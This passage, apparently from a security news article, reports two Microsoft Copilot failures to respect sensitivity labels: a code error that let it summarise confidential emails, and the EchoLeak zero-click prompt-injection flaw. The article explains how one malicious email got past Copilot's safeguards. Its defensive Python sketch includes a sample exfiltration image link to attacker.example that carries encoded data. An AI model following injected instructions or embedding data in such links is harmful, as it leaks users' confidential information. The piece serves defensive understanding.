Microsoft Copilot Bypasses Sensitivity Labels Twice in Eight Months, Exposing Confidential Data and Highlighting AI Trust Boundary Failures
Microsoft's Copilot has ignored sensitivity labels and data loss prevention (DLP) policies twice within eight months, processing confidential information it was explicitly restricted from touching. Beginning January 21, Copilot summarized confidential emails for four weeks despite those restrictions, with the U.K.'s National Health Service among the affected organizations. That incident, tracked by Microsoft as CW1226324, follows a more severe vulnerability from June 2025: CVE-2025-32711, dubbed "EchoLeak," a critical zero-click exploit that allowed a malicious email to bypass multiple Copilot security features and silently exfiltrate enterprise data, earning a CVSS score of 9.3. The two incidents stem from different root causes (a code error and a sophisticated exploit) but produced the same outcome: Copilot accessed restricted data without detection by traditional security tools such as EDR and WAF, which are architecturally blind to AI trust boundary violations inside LLM retrieval pipelines.
For four weeks starting January 21, Microsoft's Copilot read and summarized confidential emails despite every sensitivity label and DLP policy telling it not to. The enforcement points broke inside Microsoft’s own pipeline, and no security tool in the stack flagged it. Among the affected organizations was the U.K.'s National Health Service, which logged it as INC46740412 — a signal of how far the failure reached into regulated healthcare environments. Microsoft tracked it as CW1226324. The advisory, first reported by BleepingComputer on February 18, marks the second time in eight months that Copilot’s retrieval pipeline violated its own trust boundary — a failure in which an AI system accesses or transmits data it was explicitly restricted from touching. The first was worse.
In June 2025, Microsoft patched CVE-2025-32711, a critical zero-click vulnerability that Aim Security researchers dubbed “EchoLeak.” One malicious email bypassed Copilot’s prompt injection classifier, its link redaction, its Content-Security-Policy, and its reference mentions to silently exfiltrate enterprise data. No clicks and no user action were required. Microsoft assigned it a CVSS score of 9.3.
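The bypassed protections hint at how the exfiltration works: apart from the prompt injection classifier, they all act on what Copilot is about to render, scrubbing links and references so that generated output cannot carry data to an attacker-controlled endpoint. The sketch below is a minimal, hypothetical version of that kind of output-side check, not Copilot's implementation; the allow-list, the flag_suspicious_urls helper, and the query-length threshold are illustrative assumptions.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list; a real tenant would draw this from policy.
ALLOWED_DOMAINS = {"sharepoint.com", "teams.microsoft.com"}
URL_PATTERN = re.compile(r"https?://[^\s)\]<>]+")

def flag_suspicious_urls(model_output: str, max_query_len: int = 128) -> list[str]:
    """Flag URLs in model output that point outside the allow-list or carry
    an unusually long query string -- a common data-exfiltration tell."""
    flagged = []
    for url in URL_PATTERN.findall(model_output):
        parsed = urlparse(url)
        host = parsed.netloc.lower().split(":")[0]
        allowed = any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)
        if not allowed or len(parsed.query) > max_query_len:
            flagged.append(url)
    return flagged

# An injected instruction can ask the model to embed stolen text in an
# image reference; rendering that reference triggers the outbound request.
summary = (
    "Here is your summary. "
    "![status](https://attacker.example/pixel.png?d=Q29uZmlkZW50aWFsIGRhdGE)"
)
print(flag_suspicious_urls(summary))
# ['https://attacker.example/pixel.png?d=Q29uZmlkZW50aWFsIGRhdGE']
```

The point of the sketch is only to show where such checks live: on output the service itself renders, which nothing outside the service ever inspects.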
Two different root causes, one blind spot: a code error and a sophisticated exploit chain produced an identical outcome. Copilot processed data it was explicitly restricted from touching, and the security stack saw nothing.
Why EDR and WAF continue to be architecturally blind to this: Endpoint detection and response (EDR) monitors file and process behavior. Web application firewalls (WAFs) inspect HTTP payloads. Neither has a detection category for “your AI assistant just violated its own trust boundary.” That gap exists because LLM retrieval pipelines sit behind an enforcement layer that traditional security tools were never designed to observe.
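What that enforcement layer looks like, and why its failure is invisible from outside, can be sketched in a few lines. This is a simplified illustration rather than Microsoft's implementation: the Document type, the copilot_excluded flag, and the filter_for_retrieval helper are assumptions made for the example, with label names of the kind tenants define in Microsoft Purview.

```python
from dataclasses import dataclass

# Hypothetical label ranking; real tenants define labels in Microsoft Purview.
LABEL_RANK = {"Public": 0, "General": 1, "Confidential": 2, "Highly Confidential": 3}

@dataclass
class Document:
    doc_id: str
    text: str
    sensitivity_label: str
    copilot_excluded: bool  # e.g. a DLP policy that blocks AI processing

def filter_for_retrieval(candidates: list[Document],
                         ceiling: str = "General") -> list[Document]:
    """The enforcement point inside the retrieval pipeline: drop anything the
    assistant may not read before it can enter the model's context window.
    If this check is skipped or mis-evaluated, the confidential text flows
    into the prompt entirely server-side, and nothing on the endpoint or the
    network has an anomaly to detect."""
    limit = LABEL_RANK[ceiling]
    kept = []
    for doc in candidates:
        if doc.copilot_excluded:
            continue
        rank = LABEL_RANK.get(doc.sensitivity_label, LABEL_RANK["Highly Confidential"])
        if rank > limit:
            continue
        kept.append(doc)
    return kept

# When the check runs correctly, the labeled email never reaches the prompt.
emails = [
    Document("msg-1", "All-hands agenda", "General", False),
    Document("msg-2", "Patient transfer schedule", "Confidential", True),
]
print([d.doc_id for d in filter_for_retrieval(emails)])  # ['msg-1']
```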
Copilot ingested a labeled email it was told to skip, and the entire action happened inside Microsoft's infrastructure. Between the retrieval inde